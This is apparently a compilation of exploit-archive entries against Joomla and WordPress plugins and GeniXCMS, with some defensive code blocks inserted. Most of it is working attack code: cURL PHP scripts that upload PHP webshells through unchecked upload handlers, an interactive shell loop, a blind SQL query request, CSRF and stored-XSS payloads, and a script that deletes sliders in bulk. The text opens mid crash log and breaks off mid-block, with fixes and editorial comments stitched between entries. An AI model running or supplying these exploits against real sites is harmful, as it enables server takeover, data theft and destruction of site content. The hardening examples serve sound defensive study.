25  com.apple.WebCore             	0x0000000104e50f87 WebCore::RenderLayer::paintForegroundForFragments(WTF::Vector<WebCore::LayerFragment, 1ul, WTF::CrashOnOverflow> const&, WebCore::GraphicsContext*, WebCore::GraphicsContext*, WebCore::LayoutRect const&, bool, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int, WebCore::RenderObject*, bool, bool) + 423
26  com.apple.WebCore             	0x0000000104e4fc30 WebCore::RenderLayer::paintLayerContents(WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 2576
27  com.apple.WebCore             	0x0000000104e4f002 WebCore::RenderLayer::paintLayer(WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 1010
28  com.apple.WebCore             	0x0000000104e4fd62 WebCore::RenderLayer::paintLayerContents(WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 2882
29  com.apple.WebCore             	0x0000000104e7ac36 WebCore::RenderLayerBacking::paintIntoLayer(WebCore::GraphicsLayer const*, WebCore::GraphicsContext*, WebCore::IntRect const&, unsigned int, unsigned int) + 358
30  com.apple.WebCore             	0x000000010593757f WebCore::RenderLayerBacking::paintContents(WebCore::GraphicsLayer const*, WebCore::GraphicsContext&, unsigned int, WebCore::FloatRect const&) + 799
31  com.apple.WebCore             	0x000000010537dd44 WebCore::GraphicsLayer::paintGraphicsLayerContents(WebCore::GraphicsContext&, WebCore::FloatRect const&) + 132
32  com.apple.WebCore             	0x00000001058b6ad9 WebCore::PlatformCALayer::drawLayerContents(CGContext*, WebCore::PlatformCALayer*, WTF::Vector<WebCore::FloatRect, 5ul, WTF::CrashOnOverflow>&) + 361
33  com.apple.WebCore             	0x0000000105b170a7 WebCore::TileGrid::platformCALayerPaintContents(WebCore::PlatformCALayer*, WebCore::GraphicsContext&, WebCore::FloatRect const&) + 167
34  com.apple.WebCore             	0x0000000105ba36cc -[WebSimpleLayer drawInContext:] + 172
35  com.apple.QuartzCore          	0x00007fff8d7033c7 CABackingStoreUpdate_ + 3306
36  com.apple.QuartzCore          	0x00007fff8d7026d7 ___ZN2CA5Layer8display_Ev_block_invoke + 59
37  com.apple.QuartzCore          	0x00007fff8d702694 x_blame_allocations + 81
38  com.apple.QuartzCore          	0x00007fff8d6f643c CA::Layer::display_() + 1546
39  com.apple.WebCore             	0x0000000105ba35eb -[WebSimpleLayer display] + 43
40  com.apple.QuartzCore          	0x00007fff8d6f47fd CA::Layer::display_if_needed(CA::Transaction*) + 603
41  com.apple.QuartzCore          	0x00007fff8d6f3e81 CA::Layer::layout_and_display_if_needed(CA::Transaction*) + 35
42  com.apple.QuartzCore          	0x00007fff8d6f3612 CA::Context::commit_transaction(CA::Transaction*) + 242
43  com.apple.QuartzCore          	0x00007fff8d6f33ae CA::Transaction::commit() + 390
44  com.apple.QuartzCore          	0x00007fff8d701f19 CA::Transaction::observer_callback(__CFRunLoopObserver*, unsigned long, void*) + 71
45  com.apple.CoreFoundation      	0x00007fff869f7127 __CFRUNLOOP_IS_CALLING_OUT_TO_AN_OBSERVER_CALLBACK_FUNCTION__ + 23
46  com.apple.CoreFoundation      	0x00007fff869f7080 __CFRunLoopDoObservers + 368
47  com.apple.CoreFoundation      	0x00007fff869e8bf8 CFRunLoopRunSpecific + 328
48  com.apple.HIToolbox           	0x00007fff8df1156f RunCurrentEventLoopInMode + 235
49  com.apple.HIToolbox           	0x00007fff8df112ea ReceiveNextEventCommon + 431
50  com.apple.HIToolbox           	0x00007fff8df1112b _BlockUntilNextEventMatchingListInModeWithFilter + 71
51  com.apple.AppKit              	0x00007fff8ebe59bb _DPSNextEvent + 978
52  com.apple.AppKit              	0x00007fff8ebe4f68 -[NSApplication nextEventMatchingMask:untilDate:inMode:dequeue:] + 346
53  com.apple.AppKit              	0x00007fff8ebdabf3 -[NSApplication run] + 594
54  com.apple.AppKit              	0x00007fff8eb57354 NSApplicationMain + 1832
55  libxpc.dylib                  	0x00007fff8ab77958 _xpc_objc_main + 793
56  libxpc.dylib                  	0x00007fff8ab79060 xpc_main + 490
57  com.apple.WebKit.WebContent   	0x0000000103f10b40 0x103f10000 + 2880
58  libdyld.dylib                 	0x00007fff873e45c9 start + 1
*/
?>
            
source: https://www.securityfocus.com/bid/53977/info

The Easy Flash Uploader component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input.

An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process.

Easy Flash Uploader 2.0 is vulnerable; other versions may also be affected. 

<?php

$uploadfile="lo.php";

$ch = curl_init("http://www.example.com/plugins/content/efup_files/helper.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
                array('Filedata'=>"@$uploadfile",
                'JPATH_BASE'=>'../../../',
                'filesize'=>'2000',
                'filetypes'=>'*.*',
                'mimetypes'=>"*",
                'destination'=>'./'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>
            
source: https://www.securityfocus.com/bid/53975/info

The jFancy component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input.

An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

jFancy 2.03 is vulnerable; other versions may also be affected. 

Exploit :

PostShell.php
<?php

$uploadfile="lo.php.gif";
$ch = curl_init("http://www.example.com/modules/mod_jfancy/script.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
         array('photoupload'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Shell Access : http://www.example.com/images/lo.php.gif

lo.php.gif
<?php
phpinfo();
?>
            
source: https://www.securityfocus.com/bid/53973/info

The IDoEditor component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input.

An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process.

IDoEditor 1.6.16 is vulnerable; other versions may also be affected. 

<html>
<body>
<center>
<form
action="http://www.example.com/plugins/editors/idoeditor/themes/advanced/php/image.php"
method="post" enctype="multipart/form-data">
<input type="file" name="pfile">
<input type="submit" name="Submit" value="Upload">
</form>
</center>
</body>
</html>
            
source: https://www.securityfocus.com/bid/53972/info

The DentroVideo component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.

An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

DentroVideo 1.2 is vulnerable; other versions may also be affected.

Exploit 1 :

PostShell.php

<?php

$uploadfile="lo.php";

$ch = curl_init("http://www.example.com/components/com_dv/externals/phpupload/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
                array('file1'=>"@$uploadfile",
                'action'=>'upload'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

print "$postResult";

?>

Shell Access : http://www.example.com/lo.php

lo.php
<?php
phpinfo();
?>


Exploit 2 :

PostShell2.php

<?php

$uploadfile="lo.php.mpg3";

$ch = curl_init("http://www.example.com/components/com_dv/externals/swfupload/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
                array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

print "$postResult";

?>

Shell Access : http://www.example.com/dvvideos/uploads/originals/lo.php.mpg3

lo.php.mpg3
<?php
phpinfo();
?>
            
source: https://www.securityfocus.com/bid/53969/info

The Art Uploader component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input.

An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

Art Uploader 1.0.1 is vulnerable; other versions may also be affected. 

<?php

$uploadfile="lo.php";
$ch = curl_init("http://www.example.com/modules/mod_artuploader/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
         array('userfile'=>"@$uploadfile",
                'path'=>'./'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Shell Access : http://www.example.com/modules/mod_artuploader/lo.php

lo.php
<?php
phpinfo();
?>
            
source: https://www.securityfocus.com/bid/53968/info

The Simple SWFUpload component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input.

An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

Simple SWFUpload 2.0 is vulnerable; other versions may also be affected. 

<?php

$uploadfile="lo.php.gif";

$ch = curl_init("http://www.exemple.com/administrator/components/com_simpleswfupload/uploadhandler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
                array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Shell Access : http://www.exemple.com/images/stories/lo.php.gif

lo.php.gif
<?php
phpinfo();
?>
            
source: https://www.securityfocus.com/bid/53967/info

The HD FLV Player plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.

An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

HD FLV Player 1.7 is vulnerable; other versions may also be affected. 

Exploit :

PostShell.php
<?php

$uploadfile="lo.php.jpg";
$ch = curl_init("http://www.example.com/wordpress/wp-content/plugins/contus-hd-flv-player/uploadVideo.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
         array('myfile'=>"@$uploadfile",
                'mode'=>'image'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Shell Access : 
http://www.example.com/wordpress/wp-content/uploads/18_lo.php.jpg
Filename : view the source ([CTRL-u]) of the response PostShell.php prints after it has run

lo.php.jpg
<?php
phpinfo();
?>
            
source: https://www.securityfocus.com/bid/53945/info

FileManager is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.

An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. 

<?php
// The opening of this script (banner and prompt loop header) was cut off in the
// listing; the loop wrapper below is restored from the same author's
// com_joomsport script further down this page, which uses the identical prompt loop.
while (1)
{
print "\n Inj3ct0rK3d-Sh3lL#";
$uploadfile = trim(fgets(STDIN)); # f.ex : C:\\k3d.php
if ($uploadfile != "exit")
{
$ch = curl_init("http://www.example.com/modules/fileManager/xupload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile", // legacy PHP 5 cURL "@file" upload syntax
'path'=>'img'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
}
else break;
}
?>
            
source: https://www.securityfocus.com/bid/53944/info

The Joomsport component for Joomla! is prone to an SQL-injection vulnerability and an arbitrary file-upload vulnerability because it fails to sanitize user-supplied data.

Exploiting these issues could allow an attacker to compromise the application, execute arbitrary code, access or modify data, or exploit latent vulnerabilities in the underlying database. 

<?php

error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
$resp = ''; // initialise before appending, otherwise the first .= works on an undefined variable
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
print "\n|===============================================|";
print "\n| Joomla (com_joomsport) Arbitrary Shell Upload |";
print "\n| Provided By KedAns-Dz <ked-h[at]hotmail[.]com>|";
print "\n|===============================================|\n";
if ($argc < 2)
{
print "\nUsage : php $argv[0] [host] [path]";
print "\nExample : php $argv[0] www.p0c.tld /wp/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$data = "Content-Disposition: form-data; name=\"Filename\"; filename=\"k3d.php.png\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$packet = "POST {$path}components/com_joomsport/includes/imgres.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: image/png\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
// STDIN is already defined by the PHP CLI; re-defining it fails on current PHP versions.
while(1)
{
print "\n Inj3ct0rK3d-Sh3lL#";
$cmd = trim(fgets(STDIN)); # f.ex : C:\\k3d.php.png
if ($cmd != "exit")
{
$packet = "GET {$path}k3d.php.png{$html[3]} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Connection: close\r\n\r\n";
$output = http_send($host, $packet);
print $output; // the original fetched the response but never displayed it
}
else break;
}
?>

Access Shell : http://www.example.com/components/com_joomsport/images/k3d.php.png
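Every upload handler in the Joomla and WordPress entries above trusts the client-supplied filename (lo.php, lo.php.gif, lo.php.jpg, lo.php.mpg3, k3d.php.png) and stores the file under a path the uploader can predict. As an added illustration that is not part of any of these advisories, the following Python code shows the checks such a handler needs; the allowed image types and the hypothetical image-upload endpoint are assumptions.

```python
import os
import secrets

# What a hypothetical image-upload endpoint should accept (assumption).
ALLOWED_EXTENSIONS = {'jpg', 'jpeg', 'png', 'gif'}
# Names a typical Apache+PHP stack will execute or honour, checked at ANY
# position: "lo.php.gif" and "k3d.php.png" must be caught as well as "lo.php".
BLOCKED_EXTENSIONS = {'php', 'php3', 'php4', 'php5', 'php7', 'phtml', 'phar', 'htaccess'}
# Leading bytes of each allowed type, checked independently of the filename.
MAGIC = {
    'jpg': (b'\xff\xd8\xff',),
    'jpeg': (b'\xff\xd8\xff',),
    'png': (b'\x89PNG\r\n\x1a\n',),
    'gif': (b'GIF87a', b'GIF89a'),
}


class UploadRejected(ValueError):
    """Raised with a human-readable reason when an upload must not be stored."""


def vet_filename(name):
    """Validate a client-supplied filename; return its lower-case extension."""
    # Path components (../, C:\, /) never belong in an upload name.
    if name != os.path.basename(name.replace('\\', '/')) or name in ('', '.', '..'):
        raise UploadRejected('path component in filename: %r' % name)
    exts = name.lower().split('.')[1:]      # '.htaccess' -> ['htaccess']
    if not exts or exts[-1] == '':
        raise UploadRejected('missing extension: %r' % name)
    if any(e in BLOCKED_EXTENSIONS for e in exts):
        raise UploadRejected('executable extension in %r' % name)
    # Exactly one extension, and it must be on the allow-list.
    if len(exts) != 1 or exts[0] not in ALLOWED_EXTENSIONS:
        raise UploadRejected('extension not allowed: %r' % name)
    return exts[0]


def vet_content(data, ext):
    """Check the bytes really are the image type the extension claims."""
    if not any(data.startswith(m) for m in MAGIC[ext]):
        raise UploadRejected('content does not look like %s' % ext)
    # Polyglots: a valid image header followed by a PHP open tag.
    if b'<?php' in data or b'<?=' in data:
        raise UploadRejected('PHP open tag inside image data')


def screen_upload(name, data):
    """Full check; returns the server-chosen name the file would be stored under."""
    ext = vet_filename(name)
    vet_content(data, ext)
    # Never reuse the client's name: every 'Shell Access' URL above depends on
    # the uploader knowing exactly where the file landed.
    return '%s.%s' % (secrets.token_hex(16), ext)


def rejection_reason(name, data=b''):
    """Convenience wrapper: the rejection message, or None when the upload passes."""
    try:
        ext = vet_filename(name)
        if data:
            vet_content(data, ext)
    except UploadRejected as exc:
        return str(exc)
    return None


if __name__ == '__main__':
    # Constructed samples: the filenames are the ones the advisories above use,
    # the body is the "<?php phpinfo(); ?>" payload they upload.
    payload = b'<?php\nphpinfo();\n?>\n'
    for n in ('lo.php', 'lo.php.gif', 'lo.php.jpg', 'lo.php.mpg3', 'k3d.php.png', '../lo.jpg'):
        print('%-14s -> %s' % (n, rejection_reason(n, payload)))
    print('photo.gif      -> stored as', screen_upload('photo.gif', b'GIF89a' + bytes(16)))
```

Storing the file outside the web root, or in a directory where the web server has script execution disabled, is the second half of the fix; the name and content checks alone only narrow what an attacker can get past the handler.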

#### Exploit (2) Blind SQL Injection =>

<?php

$bs = curl_init("http://www.example.com/components/com_joomsport/includes/func.php");
curl_setopt($bs, CURLOPT_POST, true);
curl_setopt($bs, CURLOPT_POSTFIELDS,
array('query'=>"SELECT * FROM jos_users"));
curl_setopt($bs, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($bs);
curl_close($bs);
print "$postResult";

?>
            
# Exploit Title: WordPress: wordpress huge-it-slider 2.7.5 & Persistent JS-HTML Code injection, Arbitrary slider deletion
# Date: 2015-06-23
# Google Dork: intitle:"index of" intext:"/wp-content/plugins/slider-image/"
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Software Link: https://downloads.wordpress.org/plugin/slider-image.latest-stable.zip
# Version: 2.7.5 
# Tested on: windows 7 ultimate + Firefox.
# video demo: https://www.youtube.com/watch?v=RTLAbmyBIU8

====================================================
    * CSRF + Persistent JS/HTML Injection 
====================================================

=====================
DESCRIPTION
=====================

An attacker can lure a user with the required privileges to a page containing a malicious script,
which then submits the vulnerable parameters with injected JavaScript that is stored in the database.

============================
vulnerable POST parameters
============================
//variables with variation names//

order_by_[variation_number]
titleimage[variation_number]
sl_url[variation_number]
sl_link_target[variation_number]
im_description[variation_number]
imagess[variation_number]

//variables with constant names//

sl_pausetime
sl_changespeed

===============
EXPLOITATION
===============

The variation numbers can be extracted from a published page containing the slider; all
parameters can then be injected with JS/HTML code.

-------------------
EXAMPLE
-------------------
[Extracting data for use]

On a vulnerable site that has published a slider, the malicious user can extract the information
needed for the attack to succeed.

-----------------------------------------------------------------------------------------
[variation_number] is a variable number that could be extracted as follows.
-----------------------------------------------------------------------------------------
The attacker sees the following fragment of the source code of the page with the slider:

<!-- ##########################DOTS######################### -->

   <div class="huge_it_slideshow_dots_container_2"> [ <---SLIDER_ID_FOUND=2 ]
  <div class="huge_it_slideshow_dots_thumbnails_2">
        <div id="huge_it_dots_0_1" class="huge_it_slideshow_dots_1 huge_it_slideshow_dots_active_1" 
onclick="huge_it_change_image_1(parseInt(jQuery('#huge_it_current_image_key_1').val()), '0', data_1,false,true);
return false;" 

image_id="14" [ <---ITS_VARIATION_NUMBER!!!  ]

image_key="0"></div>
          </div>
    <a id="huge_it_slideshow_left_1" href="#" >
<div id="huge_it_slideshow_left-ico_1">
<div><i class="huge_it_slideshow_prev_btn_1 fa"></i></div></div>
        </a>
    <a id="huge_it_slideshow_right_1" href="#" >
        <div id="huge_it_slideshow_right-ico_1 , data_1">
        <div><i class="huge_it_slideshow_next_btn_1 fa"></i></div></div>
    </a>
        </div>
<!-- ##########################IMAGES######################### -->


-----------------------------------------------------------------------------------
The class names of the [<div>] tags end with a number, which is the id of the slider.
The tag [<div id="huge_it_dots_...">] also carries the [image_id] attribute, which is the number
appended to the names of the vulnerable POST parameters.

============================================
POC [DATA RELATING TO THE ABOVE]
============================================
-----------
URL REQUEST   (the id=2 value is the SLIDER_ID found above)
-----------
http://localhost/wordpress/wp-admin/admin.php?page=sliders_huge_it_slider&id=2&task=apply
--------
POSTDATA
--------
name=i0akiN-SEC&order_by_14=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22&imagess14=&
titleimage14=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22&
sl_url14=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22&sl_link_target14=&
sl_pausetime=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22&
sl_changespeed=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22&
im_description14=as%3C%2Ftextarea%3E%3Cscript%3Ealert%28%2Fi0akiN_HACK%2F%29%3B%3C%2Fscript%3E&
imagess14=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22&sl_width=500&
sl_height=300&pause_on_hover=off&slider_effects_list=cubeH&sl_position=center&task=

--------------------
RESPONSE ADMIN PAGE
--------------------

...

<input class="order_by" type="hidden" name="order_by_14" value="0" />
<div class="image-container">
    <img src="" onmouseover=alert(/i0akiN_hack/) a="" />
    <div>
        <script>
            ...        </script>
        <input type="hidden" name="imagess14" id="_unique_name14" value="" onmouseover=alert(/i0akiN_hack/) a="" />
        <span class="wp-media-buttons-icon"></span>
        <div class="huge-it-editnewuploader uploader button14 add-new-image">
            <input type="button" class="button14 wp-media-buttons-icon editimageicon" name="_unique_name_button14" id="_unique_name_button14" value="Edit image" />
        </div>
    </div>
</div>
<div class="image-options">
    <div>
        <label for="titleimage14">Title:</label>
        <input  class="text_area" type="text" id="titleimage14" name="titleimage14" id="titleimage14"  value="" onmouseover=alert(/i0akiN_hack/) a="">
    </div>
    <div class="description-block">
        <label for="im_description14">Description:</label>
        <textarea id="im_description14" name="im_description14" >as&lt;/textarea&gt;<script>alert(/i0akiN_HACK/);</script>&lt;/textarea&gt;
    </div>
    <div class="link-block">
        <label for="sl_url14">URL:</label>
        <input class="text_area url-input" type="text" id="sl_url14" name="sl_url14"  value="" onmouseover=alert(/i0akiN_hack/) a="" >
        <label class="long" for="sl_link_target14">Open in new tab</label>
        <input type="hidden" name="sl_link_target14" value="" />
        <input    class="link_target" type="checkbox" id="sl_link_target14" name="sl_link_target14" />
    </div>
    <div class="remove-image-container">
        <a class="button remove-image" href="admin.php?page=sliders_huge_it_slider&id=2&task=apply&removeslide=14">Remove Image</a>
    </div>
</div>

<div class="clear"></div>
</li>
</ul>
</div>
</div>
<div id="postbox-container-1" class="postbox-container">
    <div id="side-sortables" class="meta-box-sortables ui-sortable">
        <div id="slider-unique-options" class="postbox">
            ...
            <li>
                <label for="sl_pausetime">Pause time</label>
                <input type="text" name="sl_pausetime" id="sl_pausetime" value="" onmouseover=alert(/i0akiN_hack/) a="" class="text_area" />
            </li>
            <li>
                <label for="sl_changespeed">Change speed</label>
                <input type="text" name="sl_changespeed" id="sl_changespeed" value="" onmouseover=alert(/i0akiN_hack/) a="" class="text_area" />
            </li>

            ...

-----------------------------------------
RESPONSE PUBLISHED PAGE WITH IMAGE SLIDER
-----------------------------------------

...

<script>
    var data_2 = [];
    var event_stack_2 = [];
    video_is_playing_2 = false;
    data_2["0"] = []; data_2["0"]["id"] = "0"; data_2["0"]["image_url"] = "" onmouseover = alert(/i0akiN_hack/) a = ""; data_2["0"]["description"] = "as&lt;/textarea&gt;
<script>alert(/i0akiN_HACK/);</script>";data_2["0"]["alt"]="' onmouseover=alert(/i0akiN_hack/) a='";    

===<!-- SUCCESSFUL INJECTION :) -->===

var huge_it_trans_in_progress_2 = false;
var huge_it_transition_duration_2 = " onmouseover=alert(/i0akiN_hack/) a=";
var huge_it_playInterval_2;
// Stop autoplay.
window.clearInterval(huge_it_playInterval_2);
....

<!-- ##########################IMAGES######################### -->
<div id="huge_it_slideshow_image_container_2" class="huge_it_slideshow_image_container_2">        
    <div class="huge_it_slide_container_2">
        <div class="huge_it_slide_bg_2">
            <ul class="huge_it_slider_2">
                <li class="huge_it_slideshow_image_item_2" id="image_id_2_0">      
<a href="" onmouseover=alert(/i0akiN_hack/) a="" ><img id="huge_it_slideshow_image_2" class="huge_it_slideshow_image_2" 
src="" onmouseover=alert(/i0akiN_hack/) a="" image_id="14" />
                    </a>        
                    <div class="huge_it_slideshow_title_text_2 ">         " onmouseover=alert(/i0akiN_hack/) a="</div>
                    <div class="huge_it_slideshow_description_text_2 ">as&lt;/textarea&gt;<script>alert(/i0akiN_HACK/);</script>                        </div>
                </li>
                <input  type="hidden" id="huge_it_current_image_key_2" value="0" />
            </ul>
        </div>
    </div>
</div>

...




====================================
 * CSRF & ARBITRARY SLIDER DELETION
====================================

=====================
 POC
=====================

//delete first 100 sliders

<script> 

function sendData( id_slider ){ 
   var req=new XMLHttpRequest();
   req.open("GET","http://localhost/wordpress/wp-admin/admin.php?page=sliders_huge_it_slider&task=remove_cat&id="+id_slider,true);
   req.withCredentials="true";
   req.send();      
}

for(var i=0;i<100;i++){
     sendData( i );
}

</script>

No CSRF token (nonce) is checked on this request.
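The two requests above (the task=apply POST that stores the injected fields, and the task=remove_cat GET that the cross-site script loop fires) both succeed because the plugin never checks a nonce and never normalises its input. The following is an added example, not the plugin's own code: a hardened handler pair written against the public WordPress API. The function and option names (hugeit_example_*) and the nonce action strings are hypothetical; the field names are the ones from the POSTDATA above.

```php
<?php
// Added example (not the Slider Image plugin's code): hardened handlers for
// task=remove_cat and task=apply. Names prefixed hugeit_example_ are hypothetical.

// Build the "remove" link with a nonce bound to this slider id. wp_nonce_url()
// appends _wpnonce, which check_admin_referer() later validates.
function hugeit_example_remove_link( int $slider_id ): string {
    $url = admin_url( 'admin.php?page=sliders_huge_it_slider&task=remove_cat&id=' . $slider_id );
    return wp_nonce_url( $url, 'hugeit_example_remove_' . $slider_id );
}

// task=remove_cat: the <script> loop in the PoC works only because nothing is
// verified. Require a capability AND a nonce bound to the specific slider id.
function hugeit_example_handle_remove(): void {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges', '', array( 'response' => 403 ) );
    }
    $slider_id = isset( $_GET['id'] ) ? absint( $_GET['id'] ) : 0;
    // Stops with a 403 "link expired" page if _wpnonce is missing or invalid.
    check_admin_referer( 'hugeit_example_remove_' . $slider_id );
    delete_option( 'hugeit_example_slider_' . $slider_id );
}

// task=apply: the edit form must emit wp_nonce_field( 'hugeit_example_save_' . $id )
// so a forged cross-site POST cannot pass this check; every field is then
// normalised before it reaches the database.
function hugeit_example_handle_save(): void {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges', '', array( 'response' => 403 ) );
    }
    $slider_id = isset( $_GET['id'] ) ? absint( $_GET['id'] ) : 0;
    check_admin_referer( 'hugeit_example_save_' . $slider_id );

    $slider = array(
        // Numeric settings: the `" onmouseover=...` payload collapses to 0.
        'pausetime'   => absint( $_POST['sl_pausetime'] ?? 0 ),
        'changespeed' => absint( $_POST['sl_changespeed'] ?? 0 ),
        'images'      => array(),
    );

    foreach ( $_POST as $key => $value ) {
        // Accept only the per-image keys the plugin itself generates:
        // titleimage<N>, sl_url<N>, im_description<N>, imagess<N>, order_by_<N>
        if ( ! preg_match( '/^(titleimage|sl_url|im_description|imagess|order_by_)(\d+)$/', $key, $m ) ) {
            continue;
        }
        $image_id = (int) $m[2];
        $value    = wp_unslash( $value );
        switch ( $m[1] ) {
            case 'titleimage':
                $slider['images'][ $image_id ]['title'] = sanitize_text_field( $value );
                break;
            case 'sl_url':
                // esc_url_raw() keeps only allowed schemes; the attribute breakout is dropped.
                $slider['images'][ $image_id ]['url'] = esc_url_raw( $value );
                break;
            case 'imagess':
                $slider['images'][ $image_id ]['src'] = esc_url_raw( $value );
                break;
            case 'im_description':
                // Keep the tags a post may contain, strip <script> and event handlers.
                $slider['images'][ $image_id ]['description'] = wp_kses_post( $value );
                break;
            case 'order_by_':
                $slider['images'][ $image_id ]['order'] = absint( $value );
                break;
        }
    }
    update_option( 'hugeit_example_slider_' . $slider_id, $slider );
}
```

Input sanitisation is not a substitute for output escaping: when the stored values are rendered back into the admin form and the public page, attribute values still go through esc_attr(), text nodes through esc_html(), and the data_2 array in the inline script should be built with wp_json_encode() rather than string concatenation, so that a value can never close the surrounding quote or script block.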
            
# Exploit Title:  Persistent XSS
# Google Dork: intitle: Persistent XSS
# Date: 2015-06-21
# Exploit Author:  John Page ( hyp3rlinx )
# Website: hyp3rlinx.altervista.org
# Vendor Homepage: genixcms.org
# Software Link: genixcms.org
# Version: 0.0.3
# Tested on: windows 7
# Category: webapps


Vendor:
=============================================
genixcms.org



Product:
=====================================================
GeniXCMS v0.0.3 is a PHP based content management system



Advisory Information:
===================================================
Multiple persistent & reflected XSS vulnerabilities



Vulnerability Details:
=========================================================
GeniXCMS v0.0.3 is vulnerable to persistent and reflected XSS 


XSS Exploit code(s):
====================

Persistent XSS:
-----------------------
http://localhost/GeniXCMS-master/GeniXCMS-master/gxadmin/index.php?page=posts&act=add&token=

1-content input field
XSS injected into the content field executes once the post is published.

2-title input field
XSS injected into the title field executes immediately.


Reflected XSS:
---------------------
http://localhost/GeniXCMS-master/GeniXCMS-master/gxadmin/index.php?page=posts&q=1'<script>alert('XSS By Hyp3rlinx')</script>
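The reflected case above works because q is echoed back into the page unescaped, and the persistent cases because title and content are stored and later rendered the same way. The following is an added example, not GeniXCMS code, showing how those three values should be escaped for the context they land in; the function names are hypothetical and the inputs in self_check() are constructed to mirror the advisory's payloads. It runs from the PHP CLI.

```php
<?php
// Added example (not GeniXCMS code): context-aware output escaping for the
// q, title and content values. All function names here are hypothetical.
declare(strict_types=1);

// HTML text or attribute context. ENT_QUOTES matters: the reflected payload
// starts with a single quote, which the default flags would leave intact
// inside a single-quoted attribute.
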